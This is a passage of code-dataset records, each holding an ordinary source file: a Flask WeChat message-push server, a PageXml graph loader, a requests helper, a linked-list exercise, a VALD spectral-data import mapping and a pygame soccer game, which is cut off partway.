+{"seq_id":"217398526","text":"#!/usr/bin/python\r\n# coding: utf-8\r\n# Date 2021/7/20\r\nfrom flask import Flask,request,session\r\napp = Flask(__name__)\r\napp.config[\"SECRET_KEY\"] = \"131\"\r\n\r\nimport requests\r\nappID='xxx'\r\nappsecret='xxx'\r\ntemplate_id=\"xxx\"\r\n\r\n\r\ndef get_acctoken():\r\n url = \"https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=\" + appID + \"&secret=\" + appsecret\r\n r = requests.get(url)\r\n if 'access_token' in r.json():\r\n return r.json()['access_token']\r\n else:\r\n return False\r\n\r\ndef send_tomsg(token,title,body,touserid):\r\n data={\"touser\":touserid,\r\n \"url\":\"https://www.baidu.com\",\r\n \"template_id\":template_id,\r\n \"topcolor\":\"#FF0000\",\r\n \"data\":{\"title1\":\r\n {\"value\":\"标题:\\t\\t\\t\\t\"+title,\"color\":\"#A8A8A8\"},\r\n \"title2\":\r\n {\"value\":\"通知内容:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"title3\":\r\n {\"value\":\"通知时间:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"title4\":\r\n {\"value\":\"备注:\\t\\t\\t\\t\",\"color\":\"#A8A8A8\"},\r\n \"content1\":\r\n {\"value\":str(body)+\"\\n\"},\r\n \"content2\":\r\n {\"value\":\"2021-11-17 16:19:36\\n\"},\r\n \"content3\": {\"value\":\"本次推送由print支持\\n\"}}}\r\n url_vx = \"https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=\" + token\r\n data2=requests.post(url_vx, json=data).json()\r\n if data2['errmsg']=='ok':\r\n return True\r\n else:\r\n return False\r\n\r\n##删除当前的acctoken 可能过期了\r\n@app.route(\"/delsession/\")\r\ndef delsession():\r\n if session.get('acctoken'):\r\n session.pop('acctoken')\r\n session.clear()\r\n return 'ok'\r\n else:\r\n return 'no'\r\n\r\n#发送消息\r\n@app.route(\"/msg/\")\r\ndef test():\r\n title = request.args.get(\"title\")\r\n body = request.args.get(\"body\")\r\n touserid=request.args.get(\"touserid\")\r\n if not session.get(\"acctoken\"):\r\n session['acctoken']=get_acctoken()\r\n #print(session.get(\"acctoken\"))\r\n if not session.get(\"error_count\"):\r\n session['error_count']=1\r\n if session.get(\"acctoken\"):\r\n #print(session.get(\"acctoken\"))\r\n if send_tomsg(session.get(\"acctoken\"),title,body,touserid):\r\n return \"发送成功\"\r\n else:\r\n errr_count=session.get(\"error_count\")\r\n if isinstance(errr_count,int):\r\n session['error_count']=errr_count+1\r\n if errr_count+1>10:\r\n session.pop('acctoken')\r\n session.pop('error_count')\r\n session.clear()\r\n return \"发送失败\"\r\n else:\r\n return 'acctoken error'\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0',port=9916,debug=True)\r\n\r\n #curl http://127.0.0.1:9916/msg?title=111&body=22&touserid=xxx\r\n\r\n","sub_path":"vx_server_push.py","file_name":"vx_server_push.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"286690095","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Computing the graph for a \"Multi-singlePage-PageXml\" document\n \n A POSTERIORI EXPLANATION :))\n at some point, we had independent pages taht were stored together in a \n single .mpxml file. SO this class can load this file, and build one graph\n per page (instead of one graph per file).\n 2018/03/30 JL\n\n Copyright Xerox(C) 2017 H . Déjean\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n \n \n Developed for the EU project READ. The READ project has received funding \n from the European Union�s Horizon 2020 research and innovation programme \n under grant agreement No 674943.\n \n\"\"\"\n\n\n\n\nfrom lxml import etree\n\nfrom common.trace import traceln\nfrom xml_formats.PageXml import PageXml\n\nfrom .Graph_MultiPageXml import Graph_MultiPageXml\nfrom . import Edge\nfrom .Page import Page\n\n\nclass Graph_MultiSinglePageXml(Graph_MultiPageXml):\n '''\n Computing the graph for a MultiPageXml document\n\n USAGE:\n - call parseFile to load the DOM and create the nodes and edges\n - call detachFromDOM before freeing the DOM\n '''\n #Namespace, of PageXml, at least\n dNS = {\"pc\":PageXml.NS_PAGE_XML}\n \n #How to list the pages of a (Multi)PageXml doc\n sxpPage = \"//pc:Page\"\n\n def __init__(self, lNode = [], lEdge = []):\n Graph_MultiPageXml.__init__(self, lNode, lEdge)\n\n @classmethod\n def loadGraphs(cls\n , cGraphClass # graph class (must be subclass)\n , lsFilename\n , bNeighbourhood=True\n , bDetach=False\n , bLabelled=False\n , iVerbose=0):\n \"\"\"\n Load one graph per file, and detach its DOM\n return the list of loaded graphs\n \"\"\"\n lGraph = []\n for sFilename in lsFilename:\n if iVerbose: traceln(\"\\t%s\"%sFilename)\n lG= Graph_MultiSinglePageXml.getSinglePages(cGraphClass, sFilename, bNeighbourhood,bDetach,bLabelled, iVerbose)\n# if bNeighbourhood: g.collectNeighbors() \n# if bLabelled: g.parseDomLabels()\n# if bDetach: g.detachFromDOM()\n lGraph.extend(lG)\n return lGraph\n \n @classmethod\n def getSinglePages(cls\n , cGraphClass # graph class (must be subclass)\n , sFilename\n , bNeighbourhood=True\n , bDetach=False\n , bLabelled=False\n , iVerbose=0):\n \"\"\"\n load a pageXml\n Return a CRF Graph object\n \"\"\"\n \n lGraph=[]\n doc = etree.parse(sFilename)\n\n for pnum, page, domNdPage in cls._iter_Page_DomNode(doc):\n g = cGraphClass()\n g.doc= doc\n \n g.lNode, g.lEdge = list(), list()\n #now that we have the page, let's create the node for each type!\n setPageNdDomId = set() #the set of DOM id\n # because the node types are supposed to have an empty intersection\n\n llPageNodeByType = [ [nd for nd in nodeType._iter_GraphNode(doc, domNdPage, page) ] for nodeType in g.getNodeTypeList()]\n for iType1, lNodeType1 in enumerate(llPageNodeByType):\n lEdge = Edge.Edge.computeEdges(None, lNodeType1, g.iGraphMode)\n traceln(\"\\tType %d - %d %d nodes %d edges\"%(iType1, iType1, len(lNodeType1), len(lEdge)))\n g.lEdge.extend(lEdge)\n g.lNode.extend( lNodeType1 )\n \n for iType2 in range(iType1+1, len(llPageNodeByType)):\n #for lNodeType2 in llPageNodeByType[iType1:]:\n lNodeType2 = llPageNodeByType[iType2]\n #lPageEdge = Edge.Edge.computeEdges(lPrevPageNode, lPageNode, g.iGraphMode)\n lEdge = Edge.Edge.computeEdges(None, lNodeType1+lNodeType2, g.iGraphMode)\n traceln(\"\\tType %d - %d %d nodes, %d nodes %d edges\"%(iType1, iType2, len(lNodeType1), len(lNodeType2), len(lEdge)))\n g.lEdge.extend(lEdge)\n\n #lPageNode = [nd for nodeType in g.getNodeTypeList() for nd in nodeType._iter_GraphNode(doc, domNdPage, page) ]\n\n #check that each node appears once\n setPageNdDomId = set([nd.domid for nd in g.lNode])\n assert len(setPageNdDomId) == len(g.lNode), \"ERROR: some nodes fit with multiple NodeTypes\"\n \n if iVerbose>=2: traceln(\"\\tPage %5d %6d nodes %7d edges\"%(pnum, len(g.lNode), len(g.lEdge)))\n \n if not g.isEmpty() and len(g.lEdge) > 0: \n if bNeighbourhood: g.collectNeighbors() \n if bLabelled: g.parseDomLabels()\n # if bDetach: g.detachFromDOM()\n \n lGraph.append(g)\n if iVerbose: traceln(\"\\t\\t (%d nodes, %d edges)\"%(len(g.lNode), len(g.lEdge)) )\n \n return lGraph \n \n # ---------------------------------------------------------------------------------------------------------\n @classmethod\n def _iter_Page_DomNode(cls, doc):\n \"\"\"\n Parse a Multi-pageXml DOM, by page\n\n iterator on the DOM, that returns per page:\n page-num (int), page object, page dom node\n \n \"\"\"\n assert Graph_MultiSinglePageXml.sxpPage, \"CONFIG ERROR: need an xpath expression to enumerate PAGE elements\"\n lNdPage = doc.xpath(Graph_MultiSinglePageXml.sxpPage, namespaces=Graph_MultiSinglePageXml.dNS) #all pages\n pnum = 0\n pagecnt = len(lNdPage)\n for ndPage in lNdPage:\n pnum += 1\n iPageWidth = int( ndPage.get(\"imageWidth\") )\n iPageHeight = int( ndPage.get(\"imageHeight\") )\n page = Page(pnum, pagecnt, iPageWidth, iPageHeight, cls=None, domnode=ndPage, domid=ndPage.get(\"id\"))\n yield (pnum, page, ndPage)\n \n raise StopIteration() \n \n \n","sub_path":"TranskribusDU/graph/Graph_Multi_SinglePageXml.py","file_name":"Graph_Multi_SinglePageXml.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"537669988","text":"\"\"\" Module containing helper methods \"\"\"\n\nimport sys\nimport time\nimport traceback\nfrom datetime import datetime\nfrom decimal import Decimal\nimport requests\n\n\ndef apply_format(value):\n \"\"\"Method for applying formats\"\"\"\n return format(Decimal(value), \".5f\")\n\n\ndef apply_format_level(value):\n \"\"\"Method for applying format levels\"\"\"\n return format(Decimal(value), \".2f\")\n\n\ndef get_datetime():\n \"\"\"Method for generating datetime valsuies\"\"\"\n return datetime.now().strftime(\"%Y-%m-%d %h:%m:%s\")\n\n\ndef get_timestamp():\n \"\"\"Method for calculating timestamps\"\"\"\n return time.mktime(time.gmtime())\n\n\ndef get_response(url, resourceid, params=None):\n \"\"\"Method for executing API requests\"\"\"\n guard(resourceid, url)\n url = url % resourceid\n if params:\n url = \"%s%s\" % (url, params)\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n return response.json()\n except requests.exceptions.HTTPError as exc:\n print(\"404 Exception during request %s : %s \" % (url, exc))\n print(\"-\" * 60)\n traceback.print_exc(file=sys.stdout)\n print(\"-\" * 60)\n return None\n\n except requests.exceptions.RequestException as exc:\n print(\"Exception during request %s : %s \" % (url, exc))\n print(\"-\" * 60)\n traceback.print_exc(file=sys.stdout)\n print(\"-\" * 60)\n return None\n\n\ndef guard(resourceid, url):\n \"\"\"Method for checking parameters supplied\"\"\"\n if url is None:\n raise ValueError(\"URL should have a value supplied\")\n if resourceid is None:\n raise ValueError(\"URL %s should have a resource id value supplied\" % url)\n","sub_path":"src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"524823264","text":"\"\"\"\n 2.2 Return Kth to last\n\"\"\"\n\nclass LinkedListNode:\n def __init__(self, v):\n self.val = v\n self.next = None\n\ndef kth_to_last(sll, k):\n \"\"\"\n Runner technique on the singly linked list in order\n to have a node in advance.\n :param sll:\n :param k:\n :return:\n \"\"\"\n runner = sll\n for i in range(k):\n if not runner:\n return None\n runner = runner.next\n node = sll\n while runner:\n if not runner.next:\n return node.val\n node = node.next\n runner = runner.next\n\nif __name__ == \"__main__\":\n\n Nodes = [\n LinkedListNode(0),\n LinkedListNode(1),\n LinkedListNode(2)\n ]\n for i in range(len(Nodes)-1):\n Nodes[i].next = Nodes[i+1]\n\n print(kth_to_last(Nodes[0], -1))","sub_path":"Chapter02/02_Return_kth_to_last/kth_to_last.py","file_name":"kth_to_last.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"646241267","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThe config file for importing VALD into a database.\n\nGo to http://vamdc.tmy.se/doc/importing.html\nfor understanding what happens below.\n\"\"\"\nimport os, sys\n\nfrom imptools.linefuncs import *\n\n# bibtex-reading helper functions\n\ndef get_bibtex(linedata):\n \"return the raw data\"\n return ' '.join(linedata.split())\n\ndef get_bibtex_dbref(linedata):\n \"extract the dbref from the bibtex entry\"\n first_line = linedata.split()[0]\n typ, dbref = first_line.split('{')\n return dbref.strip(',').strip()\n \n# Setting up filenames\nbase = \"/vald/\"\nspecies_list_file = base + 'VALD_list_of_species'\nvald_cfg_file = base + 'VALD3.cfg'\nvald_file = base + 'vald3.dat'\nterms_file = base + 'terms'\nref_file = base + \"VALD3_ref.bib\"\n\n# The mapping itself\nmapping = [\n # Populate Species model, using the species input file.\n {'outfile':'species.dat',\n 'infiles':species_list_file,\n 'headlines':0,\n 'commentchar':'#',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(charrange, 0,7)},\n {'cname':'name',\n 'cbyte':(charrange, 9,19)},\n {'cname':'inchi',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'inchikey',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'ion',\n 'cbyte':(charrange, 20,22)},\n {'cname':'mass',\n 'cbyte':(charrange, 23,30)},\n {'cname':'massno',\n 'cbyte':(charrange2int, 23,30)},\n {'cname':'ionen',\n 'cbyte':(charrange, 31,40)},\n {'cname':'solariso',\n 'cbyte':(charrange, 41,47)},\n {'cname':'dissen',\n 'cbyte':(charrange, 48,57)}, \n {'cname':'ncomp',\n 'cbyte':(charrange, 132,133)},\n {'cname':'atomic',\n 'cbyte':(charrange, 134,136)},\n {'cname':'isotope',\n 'cbyte':(charrange, 137,140)},\n # many2many field \"species\" handled by separate table\n ],\n }, # end of definition for species file\n \n # State model read from states_file -upper states\n # (first section) \n {'outfile':'states.dat', \n 'infiles': (vald_file, terms_file),\n 'headlines':(2, 0),\n 'commentchar': ('#', '#'),\n 'linestep':(1, 2),\n 'lineoffset':(0,1),\n 'errline':(\"Unknown\", \"Unknown\"),\n 'linemap':[\n {'cname':'charid', #species,coup,jnum,term,energy (upper states) \n 'cbyte':(merge_cols,\n (30,36), (170,172), (77,82), (172,218), (63,77))}, \n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'energy',\n 'cbyte':(charrange, 63,77)},\n #{'cname':'j', \n # 'cbyte':(charrange, 77,82),},\n {'cname':'lande',\n 'cbyte':(charrange, 88,94),\n 'cnull':'99.00'},\n {'cname':'coupling',\n 'cbyte':(charrange, 170,172)},\n {'cname':'term',\n 'cbyte':(charrange, 172,218)},\n {'cname':'energy_ref',\n 'cbyte':(charrange, 264,268)},\n #'references':(models.Source,'pk')},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n #'references':(models.Source,'pk')},\n {'cname':'level_ref',\n 'cbyte':(charrange, 284,288)},\n #'references':(models.Source,'pk')},\n # these are read from term file\n {'cname':'j',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,1),\n 'cnull':'X',},\n {'cname':'l',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,2),\n 'cnull':'X',},\n {'cname':'s',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,3),\n 'cnull':'X',},\n {'cname':'p',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,4),\n 'cnull':'X',},\n {'cname':'j1',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,5),\n 'cnull':'X',},\n {'cname':'j2',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,6),\n 'cnull':'X',},\n {'cname':'k',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,7),\n 'cnull':'X',},\n {'cname':'s2',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,8),\n 'cnull':'X',},\n {'cname':'jc',\n 'filenum':1, # use term file\n 'cbyte':(get_term_val,9),\n 'cnull':'X',},\n ]\n }, # end of upper states\n \n # States output file appended with lower states\n {'outfile':'states.dat',\n 'infiles':(vald_file, terms_file),\n 'headlines':(2, 0), \n 'commentchar':('#','#'),\n 'linestep':(1, 2), \n 'errline':(\"Unknown\", \"Unknown\"),\n 'linemap':[\n {'cname':'charid', #species,coup,jnum,term,energy (lower states) \n 'cbyte':(merge_cols,\n (30,36), (122,124), (58,63), (124,170), (44,58))},\n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'energy',\n 'cbyte':(charrange, 44,58)},\n #{'cname':'j',\n # 'cbyte':(charrange, 58,63)},\n {'cname':'lande',\n 'cbyte':(charrange, 82,88),\n 'cnull':'99.00'},\n {'cname':'coupling',\n 'cbyte':(charrange, 122,124)},\n {'cname':'term',\n 'cbyte':(charrange, 124,170)},\n {'cname':'energy_ref',\n 'cbyte':(charrange, 264,268)},\n #'references':(models.Source,'pk')},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n #'references':(models.Source,'pk')},\n {'cname':'level_ref',\n 'cbyte':(charrange, 284,288)},\n #'references':(models.Source,'pk')},\n # these are read from term file\n {'cname':'j',\n 'cbyte':(get_term_val,1), \n 'cnull':'X',},\n {'cname':'l',\n 'cbyte':(get_term_val,2),\n 'cnull':'X',},\n {'cname':'s',\n 'cbyte':(get_term_val,3),\n 'cnull':'X',},\n {'cname':'p',\n 'cbyte':(get_term_val,4),\n 'cnull':'X',},\n {'cname':'j1',\n 'cbyte':(get_term_val,5),\n 'cnull':'X',},\n {'cname':'j2',\n 'cbyte':(get_term_val,6),\n 'cnull':'X',},\n {'cname':'k',\n 'cbyte':(get_term_val,7),\n 'cnull':'X',},\n {'cname':'s2',\n 'cbyte':(get_term_val,8),\n 'cnull':'X',},\n {'cname':'jc',\n 'cbyte':(get_term_val,9),\n 'cnull':'X',},\n ]\n }, # end of State model creation - lower states\n \n # Transition model, using the vald file \n {'outfile':'transitions.dat',\n 'infiles':vald_file,\n 'headlines':2,\n 'commentchar':'#',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(constant, 'NULL'),\n 'cnull':'NULL'},\n {'cname':'upstate',\n 'cbyte':(merge_cols,\n (30,36), (170,172), (77,82), (172,218), (63,77))},\n {'cname':'lostate',\n 'cbyte':(merge_cols,\n (30,36), (122,124), (58,63), (124,170), (44,58))},\n {'cname':'vacwave',\n 'cbyte':(charrange, 0,15)},\n {'cname':'airwave',\n 'cbyte':(charrange, 15,30)},\n {'cname':'species',\n 'cbyte':(charrange, 30,36)},\n {'cname':'loggf',\n 'cbyte':(charrange, 36,44)},\n {'cname':'landeff',\n 'cbyte':(charrange, 94,100),\n 'cnull':'99.00'},\n {'cname':'gammarad',\n 'cbyte':(charrange, 100,107),\n 'cnull':'0.0'},\n {'cname':'gammastark',\n 'cbyte':(charrange, 107,114),\n 'cnull':'0.000'}, \n {'cname':'gammawaals',\n 'cbyte':(get_gammawaals, 114,122),\n 'cnull':'0.000',\n 'debug':False},\n {'cname':'sigmawaals', # only filled if raw value > 0. \n 'cbyte':(get_sigmawaals, 114,122),\n 'cnull':'0.000',\n 'debug':False},\n {'cname':'alphawaals',\n 'cbyte':(get_alphawaals, 114,122),\n 'cnull':'0.000',\n \"debug\":False},\n {'cname':'accur',\n 'cbyte':(get_accur, (225,226), (226,236)),\n 'debug':False},\n {'cname':'comment',\n 'cbyte':(charrange, 236,252)},\n {'cname':'srctag',\n 'cbyte':(charrange, 218,225),\n 'skiperror':True}, \n {'cname':'wave_ref', \n 'cbyte':(charrange, 252,256)},\n {'cname':'loggf_ref',\n 'cbyte':(charrange, 256,260)},\n {'cname':'lande_ref',\n 'cbyte':(charrange, 268,272)},\n {'cname':'gammarad_ref',\n 'cbyte':(charrange, 272,276)},\n {'cname':'gammastark_ref',\n 'cbyte':(charrange, 276,280)},\n {'cname':'waals_ref', \n 'cbyte':(charrange, 280,284)},\n ],\n }, # end of transitions\n\n # Populate References with bibtex data file (block parsing)\n {'outfile':'references.dat', \n 'infiles':ref_file,\n 'headlines':0, \n 'commentchar':'%',\n 'startblock':('@article','@book','@techreport','@inproceedings','@misc','@ARTICLE','@phdthesis','@unpublished'),\n 'endblock':('@article','@book','@techreport','@inproceedings','@misc','@ARTICLE','@phdthesis','@unpublished'),\n 'linemap':[ \n {'cname':'dbref',\n 'cbyte':(get_bibtex_dbref,)},\n {'cname':'bibtex',\n 'cbyte':(get_bibtex,)}, \n ], \n }, # end of bibtex \n \n # Populate Source model from vald_cfg file\n {'outfile':'linelists.dat',\n 'infiles':vald_cfg_file,\n 'headlines':1,\n 'commentchar':';',\n 'linemap':[\n {'cname':'id',\n 'cbyte':(bySepNr, 1)},\n {'cname':'srcfile',\n 'cbyte':(bySepNr, 0)},\n {'cname':'srcfile_ref', \n 'cbyte':(get_srcfile_ref, 0, 3)},\n {'cname':'speclo',\n 'cbyte':(bySepNr, 2)},\n {'cname':'spechi',\n 'cbyte':(bySepNr, 3)},\n {'cname':'listtype',\n 'cbyte':(bySepNr, 4)},\n {'cname':'r1',\n 'cbyte':(bySepNr, 5)},\n {'cname':'r2',\n 'cbyte':(bySepNr, 6)},\n {'cname':'r3',\n 'cbyte':(bySepNr, 7)},\n {'cname':'r4',\n 'cbyte':(bySepNr, 8)},\n {'cname':'r5',\n 'cbyte':(bySepNr, 9)},\n {'cname':'r6',\n 'cbyte':(bySepNr, 10)},\n {'cname':'r7',\n 'cbyte':(bySepNr, 11)},\n {'cname':'r8',\n 'cbyte':(bySepNr, 12)},\n {'cname':'r9',\n 'cbyte':(bySepNr, 13)},\n {'cname':'srcdescr',\n 'cbyte':(bySepNr, 14)},\n ],\n }, # end of definition for vald_conf file\n \n \n\n ]\n\n#mapping = [mapping[-2]]\n","sub_path":"nodes/vald/mapping_vald3.py","file_name":"mapping_vald3.py","file_ext":"py","file_size_in_byte":11555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"189926060","text":"import pygame\r\nimport time\r\nimport random\r\nimport torch\r\n\r\nclass Ball():\r\n def __init__(self):\r\n self.img = pygame.image.load('Soccerball.png')\r\n self.dx = 0\r\n self.dy = 0\r\n self.dimension = 20\r\n self.x = 190\r\n self.y = 240\r\n\r\n def reset(self):\r\n self.dx = 0\r\n self.dy = 0\r\n self.x = 190\r\n self.y = 240\r\n \r\n def draw(self, soccerField, player1, player2, gameDisplay, display=False):\r\n self.setPosition(self.x + self.dx, self.y + self.dy, soccerField, player1, player2)\r\n\r\n if self.y == soccerField.topBorder:\r\n if inBetween(self.x, soccerField.goalStart, soccerField.goalEnd) and inBetween(self.x + self.dimension, soccerField.goalStart, soccerField.goalEnd):\r\n if self.dy != 0:\r\n player2.goals += 1\r\n self.reset()\r\n player1.reset()\r\n player2.reset()\r\n \r\n if self.y + self.dimension == soccerField.bottomBorder:\r\n if inBetween(self.x, soccerField.goalStart, soccerField.goalEnd) and inBetween(self.x + self.dimension, soccerField.goalStart, soccerField.goalEnd):\r\n if self.dy != 0:\r\n player1.goals += 1\r\n self.reset()\r\n player1.reset()\r\n player2.reset()\r\n\r\n if self.dx > 0:\r\n self.dx -= 1\r\n elif self.dx < 0:\r\n self.dx += 1\r\n if self.dy > 0:\r\n self.dy -= 1\r\n elif self.dy < 0:\r\n self.dy += 1\r\n \r\n if display:\r\n gameDisplay.blit(self.img, (self.x, self.y))\r\n\r\n def setPosition(self, x, y, soccerField, player1, player2):\r\n # if a player has the ball, it goes with them unless stolen by the other player\r\n if player1.possession:\r\n if (inBetween(x, player2.x, player2.x + player2.dimension) or inBetween(x + self.dimension, player2.x, player2.x + player2.dimension)) and (inBetween(y, player2.y, player2.y + player2.dimension) or inBetween(y + self.dimension, player2.y, player2.y + player2.dimension)):\r\n # do a steal\r\n player1.possession = False\r\n\r\n if self.x < player1.x:\r\n self.dx = -1\r\n elif self.x > player1.x:\r\n self.dx = 1\r\n\r\n if self.y < player1.y:\r\n self.dy = -1\r\n elif self.y > player1.y:\r\n self.dy = 1\r\n\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n else:\r\n player1.possession = True\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n elif player2.possession:\r\n if (inBetween(x, player1.x, player1.x + player1.dimension) or inBetween(x + self.dimension, player1.x, player1.x + player1.dimension)) and (inBetween(y, player1.y, player1.y + player1.dimension) or inBetween(y + self.dimension, player1.y, player1.y + player1.dimension)):\r\n # do a steal\r\n player2.possession = False\r\n\r\n if self.x < player1.x:\r\n self.dx = -1\r\n elif self.x > player1.x:\r\n self.dx = 1\r\n\r\n if self.y < player1.y:\r\n self.dy = -1\r\n elif self.y > player1.y:\r\n self.dy = 1\r\n\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n else:\r\n player2.possession = True\r\n self.x = player2.x + player2.dimension\r\n self.y = player2.y + player2.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n else:\r\n player1.possession = False\r\n player2.possession = False\r\n \r\n # if the ball travels on its own to the border of the field, it stops there\r\n if x + self.dimension > soccerField.rightBorder:\r\n self.x = soccerField.rightBorder - self.dimension\r\n elif x < soccerField.leftBorder:\r\n self.x = soccerField.leftBorder\r\n else:\r\n self.x = x\r\n\r\n if y + self.dimension > soccerField.bottomBorder:\r\n self.y = soccerField.bottomBorder - self.dimension\r\n elif y < soccerField.topBorder:\r\n self.y = soccerField.topBorder\r\n else:\r\n self.y = y\r\n\r\n # if the ball is next to a player, they get position of it\r\n if inBetween(x, player1.x, player1.x + player1.dimension) or inBetween(x + self.dimension, player1.x, player1.x + player1.dimension):\r\n if inBetween(y, player1.y, player1.y + player1.dimension) or inBetween(y + self.dimension, player1.y, player1.y + player1.dimension):\r\n player1.possession = True\r\n player2.possession = False\r\n self.x = player1.x + player1.dimension\r\n self.y = player1.y + player1.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n \r\n if inBetween(x, player2.x, player2.x + player2.dimension) or inBetween(x + self.dimension, player2.x, player2.x + player2.dimension):\r\n if inBetween(y, player2.y, player2.y + player2.dimension) or inBetween(y + self.dimension, player2.y, player2.y + player2.dimension):\r\n player2.possession = True\r\n player1.possession = False\r\n self.x = player2.x + player2.dimension\r\n self.y = player2.y + player2.dimension\r\n self.dx = 0\r\n self.dy = 0\r\n\r\nclass Field():\r\n def __init__(self):\r\n self.img = pygame.image.load('pitch.png')\r\n self.topBorder = 25\r\n self.leftBorder = 25\r\n self.bottomBorder = 475\r\n self.rightBorder = 375\r\n self.goalStart = 150\r\n self.goalEnd = 250\r\n\r\n def draw(self, gameDisplay, display=False):\r\n if display:\r\n gameDisplay.blit(self.img,(0,0))\r\n\r\nclass Player():\r\n def __init__(self, num):\r\n if (num == 1):\r\n self.img = pygame.image.load('player1.png')\r\n self.direction = 1\r\n self.y = 25\r\n elif (num == 2):\r\n self.img = pygame.image.load('player2.png')\r\n self.direction = -1\r\n self.y = 415\r\n\r\n self.num = num\r\n self.x = 170\r\n self.dx = 0\r\n self.dy = 0\r\n self.dimension = 60\r\n self.possession = False \r\n self.kickForce = 12\r\n self.goals = 0 \r\n \r\n def reset(self):\r\n if (self.num == 1):\r\n self.y = 25\r\n elif (self.num == 2):\r\n self.y = 415\r\n \r\n self.x = 170\r\n self.dx = 0\r\n self.dy = 0\r\n\r\n def draw(self, soccerField, gameDisplay, display=False):\r\n self.setPosition(self.x + self.dx, self.y + self.dy, soccerField)\r\n if display:\r\n gameDisplay.blit(self.img,(self.x, self.y))\r\n\r\n def setPosition(self, x, y, soccerField):\r\n if x + self.dimension > soccerField.rightBorder:\r\n self.x = soccerField.rightBorder - self.dimension\r\n elif x < soccerField.leftBorder:\r\n self.x = soccerField.leftBorder\r\n else:\r\n self.x = x\r\n \r\n if y + self.dimension > soccerField.bottomBorder:\r\n self.y = soccerField.bottomBorder - self.dimension\r\n elif y < soccerField.topBorder:\r\n self.y = soccerField.topBorder\r\n else:\r\n self.y = y\r\n \r\n def kick(self, soccerBall):\r\n if self.possession:\r\n self.possession = False\r\n soccerBall.dy = self.direction*self.kickForce\r\n if self.num == 2:\r\n soccerBall.y = self.y - soccerBall.dimension\r\n\r\nclass SoccerGame():\r\n def __init__(self, display_width=400, display_height=500):\r\n pygame.init()\r\n self.gameDisplay = pygame.display.set_mode((display_width,display_height))\r\n pygame.display.set_caption('Soccer')\r\n self.n_action_space = 5\r\n self.n_observation_space = 14\r\n\r\n def step(self, player_1_action, player_2_action):\r\n done = False\r\n p1_rew = 0\r\n p2_rew = 0\r\n p1_possession_initial = self.p1.possession\r\n p2_possession_initial = self.p2.possession\r\n\r\n if player_1_action == 0:\r\n if self.p1.possession:\r\n self.p1.dx = -3\r\n else:\r\n self.p1.dx = -5\r\n \r\n elif player_1_action == 1:\r\n if self.p1.possession:\r\n self.p1.dx = 3\r\n else:\r\n self.p1.dx = 5\r\n\r\n elif player_1_action == 2:\r\n if self.p1.possession:\r\n self.p1.dy = -3\r\n else:\r\n self.p1.dy = -5\r\n\r\n elif player_1_action == 3:\r\n if self.p1.possession:\r\n self.p1.dy = 3\r\n else:\r\n self.p1.dy = 5\r\n\r\n elif player_1_action == 4:\r\n self.p1.kick(self.ball)\r\n\r\n if player_2_action == 0:\r\n if self.p2.possession:\r\n self.p2.dx = -3\r\n else:\r\n self.p2.dx = -5\r\n \r\n elif player_2_action == 1:\r\n if self.p2.possession:\r\n self.p2.dx = 3\r\n else:\r\n self.p2.dx = 5\r\n\r\n elif player_2_action == 2:\r\n if self.p2.possession:\r\n self.p2.dy = -3\r\n else:\r\n self.p2.dy = -5\r\n\r\n elif player_2_action == 3:\r\n if self.p2.possession:\r\n self.p2.dy = 3\r\n else:\r\n self.p2.dy = 5\r\n\r\n elif player_2_action == 4:\r\n self.p2.kick(self.ball)\r\n \r\n self.field.draw(self.gameDisplay, self.display) \r\n self.p2.draw(self.field, self.gameDisplay, self.display)\r\n self.p1.draw(self.field, self.gameDisplay, self.display)\r\n self.ball.draw(self.field, self.p1, self.p2, self.gameDisplay, self.display)\r\n displayScores(self.p1, self.p2, self.gameDisplay, 